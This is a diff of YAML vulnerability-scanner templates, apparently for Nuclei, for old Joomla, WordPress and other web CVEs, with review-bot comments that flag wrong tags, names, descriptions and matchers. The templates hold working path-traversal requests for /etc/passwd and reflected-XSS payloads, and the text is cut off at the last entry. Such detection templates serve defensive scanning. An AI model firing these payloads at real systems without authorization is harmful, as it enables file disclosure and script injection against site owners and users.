description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12595
- https://www.cvedetails.com/cve/CVE-2010-2045
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2050.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2050
info:
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12611
- https://www.cvedetails.com/cve/CVE-2010-2050
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2128.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2128
info:
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12607
- https://www.cvedetails.com/cve/CVE-2010-2128
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2507.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2507
info:
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/13981
- https://www.cvedetails.com/cve/CVE-2010-2507
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2680.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2680
info:
name: Joomla! Component jesectionfinder - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14064
- https://www.cvedetails.com/cve/CVE-2010-2680
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2857.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2857
info:
name: Joomla! Component Music Manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
reference: |
- https://www.exploit-db.com/exploits/14274
- https://www.cvedetails.com/cve/CVE-2010-2857
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-2918.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2918
info:
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
author: daffainfo
severity: high
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
reference:
- https://www.exploit-db.com/exploits/31708
- https://www.cvedetails.com/cve/CVE-2010-2918
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
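Review bot: The `tags` line marks this template `lfi`, but the name and description both describe a PHP remote file inclusion through `mosConfig_absolute_path`. Tag-based scan selection and reporting would file the finding under the wrong class; `tags: cve,cve2010,joomla,lfi,rfi` would match the advisory. The description should also state that the check only confirms that a local path is accepted by the parameter, not that remote inclusion is possible.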

27
CVE-2010-3203.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-3203
info:
name: Joomla! Component PicSell 1.0 - Local File Disclosure
author: daffainfo
severity: high
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
reference: |
- https://www.exploit-db.com/exploits/14845
- https://www.cvedetails.com/cve/CVE-2010-3203
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
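Review bot: The matcher cannot succeed for this request: the path asks for `../../../configuration.php`, but the regex matcher still looks for `root:.*:0:0`, which is `/etc/passwd` content. A vulnerable host would return the Joomla configuration file and the template would report nothing, so a clean result is a false negative. The matcher should test for content of the requested file instead, for example a `word` matcher on `class JConfig` with `part: body`, combined with the existing `status` check.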

27
CVE-2010-4282.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-4282
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
reference:
- https://www.exploit-db.com/exploits/15643
- https://www.cvedetails.com/cve/CVE-2010-4282
tags: cve,cve2010,lfi,joomla
requests:
- method: GET
path:
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
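Review bot: The `name` field reads `phpShowtime 2.0 - Directory Traversal`, but the description and the request path (`/pandora_console/ajax.php`) are for Pandora FMS, and the `joomla` tag does not apply either. This looks copied from CVE-2012-0981.yaml in the same commit, so reports and tag-filtered scans would attribute the finding to the wrong product. Suggested: `name: Pandora FMS < 3.1.1 - Directory Traversal`, with `joomla` replaced by a product tag such as `pandorafms`.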

27
CVE-2010-4719.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-4719
info:
name: Joomla! Component JRadio - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15749
- https://www.cvedetails.com/cve/CVE-2010-4719
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-4769.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-4769
info:
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15585
- https://www.cvedetails.com/cve/CVE-2010-4769
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-4977.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-4977
info:
name: Joomla! Component Canteen 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34250
- https://www.cvedetails.com/cve/CVE-2010-4977
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
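Review bot: The description is for a SQL injection through the `mealid` parameter, while the name, the `lfi` tag and the request all test a file inclusion through `controller`. Either the description was taken from a different CVE entry or the check is filed under the wrong CVE id; as written, a match would be reported against an advisory that describes another flaw. The id and description should be reconciled with the referenced exploit-db entry before merging. CVE-2010-5028.yaml has the same mismatch (SQL injection via `catid` in the description, file inclusion via `view` in the request).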

27
CVE-2010-5028.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-5028
info:
name: Joomla! Component JE Job 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
reference:
- https://www.exploit-db.com/exploits/12601
- https://www.cvedetails.com/cve/CVE-2010-5028
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-5286.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-5286
info:
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/34837
- https://www.cvedetails.com/cve/CVE-2010-5286
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2011-2744.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2011-2744
info:
name: Chyrp 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
reference:
- https://www.exploit-db.com/exploits/35945
- https://www.cvedetails.com/cve/CVE-2011-2744
tags: cve,cve2011,lfi,chyrp
requests:
- method: GET
path:
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-0896.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2012-0896
info:
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
author: daffainfo
severity: high
description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
tags: cve,cve2012,lfi,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-0981.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2012-0981
info:
name: phpShowtime 2.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/18435
- https://www.cvedetails.com/cve/CVE-2012-0981
tags: cve,cve2012,lfi,phpshowtime
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-0996.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2012-0996
info:
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
reference:
- https://www.exploit-db.com/exploits/36784
- https://www.cvedetails.com/cve/CVE-2012-0996
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2012-1226.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2012-1226
info:
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
reference:
- https://www.exploit-db.com/exploits/36873
- https://www.cvedetails.com/cve/CVE-2012-1226
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -9,6 +9,11 @@ info:
- https://www.exploit-db.com/exploits/38936
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
tags: cve,cve2013,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2013-7240
cwe-id: CWE-22
requests:
- method: GET

27
CVE-2014-10037.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2014-10037
info:
name: DomPHP 0.83 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
reference:
- https://www.exploit-db.com/exploits/30865
- https://www.cvedetails.com/cve/CVE-2014-10037
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

37
CVE-2014-4539.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2014-4539
info:
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4539
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.cookie)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4544.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2014-4544
info:
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4544
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4550.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4558.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2014-4558
info:
name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/37d7936a-165f-4c37-84a6-7ba5b59a0301
- https://nvd.nist.gov/vuln/detail/CVE-2014-4558
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4558
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
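Review bot: The request path ends with a space before the closing quote (`…%3C/script%3E "`), so the template sends a URL with a trailing raw space. Depending on how the client serialises it, that gives either a malformed request line or an extra `%20` appended to the `api_url` value, and the result of the check then no longer reflects the host's real state. Remove the trailing space so the value ends at `%3C/script%3E`.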

37
CVE-2014-4561.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2014-4561
info:
name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d
- https://nvd.nist.gov/vuln/detail/CVE-2014-4561
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4561
cwe-id: CWE-79
description: "The ultimate-weather plugin 1.0 for WordPress has XSS"
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

37
CVE-2014-4592.yaml Normal file

@ -0,0 +1,37 @@
id: CVE-2014-4592
info:
name: WP Planet <= 0.1 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3
- https://nvd.nist.gov/vuln/detail/CVE-2014-4592
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4592
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

27
CVE-2014-5111.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2014-5111
info:
name: Fonality trixbox - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.
reference: |
- https://www.exploit-db.com/exploits/39351
- https://www.cvedetails.com/cve/CVE-2014-5111
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2014-5258.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2014-5258
info:
name: webEdition 6.3.8.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/34761
- https://www.cvedetails.com/cve/CVE-2014-5258
tags: cve,cve2014,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
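Review bot: The description says the flaw is reachable by remote authenticated users, yet the request is sent without any session or credentials. Unless `showTempFile.php` is reachable anonymously on affected versions, which the page does not show, the check will receive a login page or redirect and never match, so a clean scan result says little about exposure. Either add the login step or state in the description that the template only detects instances where the script is exposed without authentication.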


@ -4,9 +4,9 @@ info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
@ -18,7 +18,6 @@ requests:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header


@ -7,13 +7,13 @@ info:
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
tags: cve,cve2015,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-1000012
cwe-id: CWE-200
description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET

27
CVE-2015-2067.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2015-2067
info:
name: Magento Server Magmi Plugin - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
tags: cve,cve2015,lfi,magento
requests:
- method: GET
path:
- "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2015-2068.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2015-2068
info:
name: Magento Server Magmi Plugin - Cross Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
tags: cve,cve2015,magento,xss
requests:
- method: GET
path:
- '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

27
CVE-2015-4414.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2015-4414
info:
name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/37274
- https://www.cvedetails.com/cve/CVE-2015-4414
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2015-4632.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2015-4632
info:
name: Koha 3.20.1 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
reference: |
- https://www.exploit-db.com/exploits/37388
- https://www.cvedetails.com/cve/CVE-2015-4632
tags: cve,cve2015,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2015-4632
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

32
CVE-2015-6920.yaml Normal file

@ -0,0 +1,32 @@
id: CVE-2015-6920
info:
name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability.
reference:
- https://packetstormsecurity.com/files/133371/
- https://nvd.nist.gov/vuln/detail/CVE-2015-6920
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
- method: GET
path:
